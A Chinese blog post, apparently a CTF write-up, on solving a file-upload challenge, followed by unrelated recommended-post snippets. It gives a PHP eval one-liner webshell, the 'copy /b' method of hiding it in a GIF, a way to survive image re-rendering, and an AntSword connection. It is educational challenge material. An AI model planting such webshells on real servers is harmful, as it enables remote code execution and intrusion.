时隔四天,终于把这道文件上传漏洞题做出来了。

已于 2022-04-27 21:56:30 修改
阅读量1.9k 收藏
点赞数
文章标签: php web安全
于 2022-04-27 21:53:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qz362228/article/details/124460887
版权

这里附上各种一句话木马大全

先看题:
在这里插入图片描述
说明了文件保存路径./upload。点击展示发现有.htaccess文件,还有一个flag.php文件
在这里插入图片描述
在文本框中输入.htaccess,点击预览,出现下面这句话。但输入flag.php
,会弹框说不能直接操作flag文件。看下面这句话我们可以知道:在./upload目录下,文件名为098f6bcd4621d373cade4e832627b4f6.gif的文件可以php代码解析出来。所以可以想到要上传一个图片马,而且文件名为098f6bcd4621d373cade4e832627b4f6.gif
在这里插入图片描述
但看下图,若我们随便上传一个图片,文件名都会被改变。这里我上传了2.gif文件
在这里插入图片描述
所以要思考怎样才能让上传后的文件名能为098f6bcd4621d373cade4e832627b4f6.gif。于是我想到看看直接输入下面这个url会怎样

http://120.79.135.77:10002/range/upload/flag.php

结果出现了这一幕,既然它出现了就一定是有问题的(然而我一开始发现的时候却并没有在意它),然后随便点开看了一下,就知道了是用MD5加密使文件名改变的。
在这里插入图片描述
然后将098f6bcd4621d373cade4e832627b4f6解密得是test。也就是说我们只要将文件名为test.gif的文件上传,就能被保存为098f6bcd4621d373cade4e832627b4f6.gif
在这里插入图片描述
然后我们开始制作图片马。在shell.php文件中写入下面这个一句话木马,然后在命令行输入copy 2.gif /b + shell.php /a test.gif2.gif是一个普通图片,得到的test.gif就是我们要的图片马了

<? @eval($_REQUEST[x]);?>

然后将test.gif上传,下载后的图片用010 Editor打开却发现php代码不见了,这时就想到是二次渲染,那就将原图和下载的图片比较,然后在相同部分插入一句话木马。
【就是做这一步花了我好久时间,我知道是二次渲染,试了好多次插入一句话木马,但保存后的图片的马还是不见了,直到今天,在最前面的蓝色部分(相同部分)插入马,终于成功—多尝试,细节细节细节!!】
在这里插入图片描述
在蚁剑中连接得到flag
在这里插入图片描述
在这里插入图片描述

乔治777
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
中泰化工周度观点20W43:时隔四年,本轮MDI涨价有何异同.pdf
08-21
时隔四年,MDI再次出现显著涨价,这次涨价与2016年的涨价潮有诸多相似之处,但也存在一些明显的差异。 首先,从行业供需角度看,两次涨价都是由于MDI市场的供应收缩。MDI行业具有高度垄断性,生产商的市场行为对...
md5签名 python_Python加密—MD5加密
weixin_39705794的博客
02-07 380
# encoding: utf-8import hashlibm = hashlib.md5() #创建md5对象data = 'test'm.update(data.encode('utf-8')) #先对字符串encode,然后进行MD5加密md5_data = m.hexdigest() #hexdigest()为十六进制值,digest()为二进制值print(md5_data)加密结...
linux 对字符串做md5,Linux下对字符串进行MD5加密
weixin_28999575的博客
05-01 1255
比如要用MD5在linux下加密字符串“test",可以使用命令:$ echo -n test|md5sum098f6bcd4621d373cade4e832627b4f6 -或$ echo -n test|openssl md5(stdin)= 098f6bcd4621d373cade4e832627b4f6但不要用把字符串写到文本里,然后再直接用MD5计算文本,这样计算出来的结果是不对的。如...
二、哈希算法和Merkle Tree
卓越无关环境,保持空杯心态——靡不有初,鲜克有终
10-24 2108
章节系列目录:点击跳转 文章目录哈希算法哈希函数的定义可靠哈希函数需满足的要求哈希函数的主要作用哈希实际例子Merkle Tree默克尔树完整性校验的方法哈希列表 Hash ListMerkle Tree 哈希树总结 哈希算法 哈希函数的定义   哈希函数:给一个任意大小的数据生成出一个固定长度的数据,作为它的映射。   你可以把哈希函数想象成“搅拌机”,一堆数据丢进去出来一段长度固定的16进制的数值就叫哈希值 可靠哈希函数需满足的要求 一个可靠的哈希算法要满足如下三点 1.安全,给定数据 M 容易算出哈
由一次安全扫描引发的思考:如何保障 api 接口的安全性?
爱写代码的程序员
05-29 329
引言 前段时间,公司对运行的系统进行了一次安全扫描,使用的工具是 IBM 公司提供的 AppScan 。 这个正所谓不扫不要紧,一扫吓一跳,结果就扫出来这么个问。 我们的一个年老失修的内部系统,在登录的时候,被扫描出来安全隐患,具体学名是啥记不清了,大致就是我们在发送登录请求的时候,有个字段名是 password , AppScan 认为这个是不安全的,大概就是下面: 我第一个反应是把这个字段名字改一下,毕竟能简单解决就简单解决嘛,结果当然是啪啪啪打脸。 这个名字我不管是换成 aaa 还是 bbb ,再
独家:小程序主体迁移功能终于来了!
03-29
时隔三个月,它终于来了。           1       终于解决了开发者的 切肤之痛   我们火速进行了测试,并结合官方说明,总结了以下几个需要注意的地方:       目前支持个人迁到组织,组织迁到组织(包括...
竞品分析丨时隔两年,再看转转与闲鱼.pdf
07-22
竞品分析丨时隔两年,再看转转与闲鱼 本文通过市场数据表现,调研闲鱼和转转在二手交易市场中的竞争格局,所处行业地位,以及存在的差距和形成差距的原因。通过对市场背景、竞争格局分析、百度指数分析、酷 iOS ...
时隔六年,Intel再推无核显处理器.pdf
09-25
市场对Intel推出无核显CPU的原因有多种猜测,包括可能是由于10nm制程技术的问,或者是为了应对安全漏洞如Spectre和Meltdown所做的调整。过去,CPU屏蔽核心显卡的情况并非罕见,有时通过解锁可以提高产品的性价比。...
银行业日报:央行时隔16日重启逆回购操作.pdf
08-22
在本报告中,央行在时隔16日后重启逆回购操作,意味着在金融市场中注入短期资金,以维护市场流动性稳定。这一举措可能是为了应对节后资金需求的波动,确保金融机构有足够的资金进行日常运营。 【银行行业运行状况】...
Java反序列化漏洞利用的学习与实践
weixin_33852020的博客
09-15 376
本文讲的是Java反序列化漏洞利用的学习与实践, 利用DeserLab 建议你在阅读本文之前,先阅读《攻击Java反序列化过程》,这样你就会对java反序列化有一个比较清晰的认识。除此之外,这篇文章还提到了一个“DeserLab”的演示应用。为了有效利用反序列化漏洞,理解序列化的原理以及反序列化漏洞利用的工作原理(如面向属性的编程原理),研究人员就要找...
给网页加密码
quietprofound的专栏
09-25 3668
【下載】本範例有包含一個 md5.js 檔案,您必須先下載! 請先開一個新網頁,並將下方程式碼貼在  內 var pwd=prompt("請輸入密碼:","");if(pwd != null && md5(pwd) == "098f6bcd4621d373cade4e832627b4f6"){ document.location="http://dob.tnc.edu.tw/aut
JS和Java在对中文进行MD5加密时,不一致问解决
热门推荐
zl
03-27 1万+
最近和前端同学调试,发现我这里总是无法验证通过,因为他给我的MD5和我生成的MD5总是对不上。但是一开始的时候,我是验证了两边的方法的,以test为例在页面的console中输入MD5('test')则输出结果为098f6bcd4621d373cade4e832627b4f6在java中的代为如下System.out.println(DigestUtils.md5Hex("test"));则输出...
文件漏洞原理与实践练习
weixin_54217081的博客
12-13 1275
一.单选 1.IIS默认的Web目录是( C ) A.C:\phpStudy\PHPTutorial\WWW B.C:\xampp\htdocs C.C:\Inetpub\wwwroot D./var/www/html
文件及相关例
最新发布
2401_82388450的博客
04-13 1008
文件漏洞是指用户上了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和有效的,“文件” 本身没有问,有问的是文件后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。
文件漏洞(一) upload-labs靶场练习
好好睡觉
03-18 5600
常见文件漏洞类型总结、upload-labs靶场
文件漏洞知识总结
二狗的博客
03-08 411
国光有一台 XPS15 里面运行着 macOS 和 Ubuntu 双系统,其中 XPS 主要系统就是 Ubuntu,国光在 Ubuntu里面搭建了一个离线的 CTFd 里面还运行着 Docker、宝塔。基本上很多服务都可以在我的 XPS 上运行起来了,出去讲课的时候会带着我的 XPS 和MBP 一起,离线靶场一开美滋滋,更关键的是往自己的靶场里面填充目有一种养成游戏的感觉,很有成就感。
记一次简单的文件漏洞
m0_62670778的博客
08-28 396
三道简单的文件漏洞
请用pygame写一个类似天天酷跑的小游戏,要求:地图不断刷新三个障碍物,和金币,越过障碍物并且累计吃到时隔金币游戏获胜,玩家只能在游戏窗口内活动
05-30
好的,下面是一个简单的类似天天酷跑的小游戏,你可以在Python中运行并进行体验。 ```python import pygame import random # 初始化pygame模块 pygame.init() # 游戏窗口的宽度和高度 WIDTH = 800 HEIGHT = 600 # 设置游戏窗口 screen = pygame.display.set_mode((WIDTH, HEIGHT)) pygame.display.set_caption("天天酷跑") # 玩家的图片 player_img = pygame.image.load("player.png").convert_alpha() # 障碍物的图片 obstacle_img = pygame.image.load("obstacle.png").convert_alpha() # 金币的图片 coin_img = pygame.image.load("coin.png").convert_alpha() # 玩家的初始位置和速度 player_x = 100 player_y = HEIGHT - player_img.get_height() - 50 player_speed = 5 # 障碍物列表和速度 obstacles = [] obstacle_speed = 10 # 金币列表 coins = [] # 计分板 score = 0 font = pygame.font.Font(None, 36) # 游戏循环 while True: # 处理事件 for event in pygame.event.get(): if event.type == pygame.QUIT: pygame.quit() sys.exit() # 添加障碍物和金币 if len(obstacles) < 3: obstacle_x = WIDTH + random.randint(100, 500) obstacle_y = HEIGHT - obstacle_img.get_height() - 50 obstacles.append(pygame.Rect(obstacle_x, obstacle_y, obstacle_img.get_width(), obstacle_img.get_height())) coin_x = WIDTH + random.randint(100, 500) coin_y = random.randint(50, HEIGHT - coin_img.get_height() - 50) coins.append(pygame.Rect(coin_x, coin_y, coin_img.get_width(), coin_img.get_height())) # 移动障碍物和金币 for i in range(len(obstacles)): obstacles[i].x -= obstacle_speed coins[i].x -= obstacle_speed # 如果障碍物移出了屏幕,从列表中删除它 if obstacles[0].x < -obstacle_img.get_width(): obstacles.pop(0) coins.pop(0) # 检测碰撞 player_rect = pygame.Rect(player_x, player_y, player_img.get_width(), player_img.get_height()) for i in range(len(obstacles)): obstacle_rect = obstacles[i] if player_rect.colliderect(obstacle_rect): pygame.quit() sys.exit() coin_rect = coins[i] if player_rect.colliderect(coin_rect): coins.pop(i) score += 1 # 移动玩家 keys = pygame.key.get_pressed() if keys[pygame.K_UP]: player_y -= player_speed if player_y < 0: player_y = 0 elif keys[pygame.K_DOWN]: player_y += player_speed if player_y > HEIGHT - player_img.get_height(): player_y = HEIGHT - player_img.get_height() # 绘制游戏场景 screen.fill((255, 255, 255)) screen.blit(player_img, (player_x, player_y)) for i in range(len(obstacles)): screen.blit(obstacle_img, (obstacles[i].x, obstacles[i].y)) screen.blit(coin_img, (coins[i].x, coins[i].y)) score_text = font.render("得分:" + str(score), True, (0, 0, 0)) screen.blit(score_text, (10, 10)) pygame.display.update() ``` 要运行这个游戏,你需要准备三张图片(player.png、obstacle.png、coin.png),并将它们放在与python文件相同的目录下。你可以在互联网上找到这些图片。 你可以使用WASD或方向键来移动玩家。障碍物和金币会从右侧向左侧移动,并在移出屏幕后重新生成。如果玩家撞到了障碍物,游戏将会结束,你可以通过关闭游戏窗口来退出游戏。如果玩家吃到了金币,得分就会加1。当得分达到3分时,游戏将会获胜。 希望这个例子对你有所帮助!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值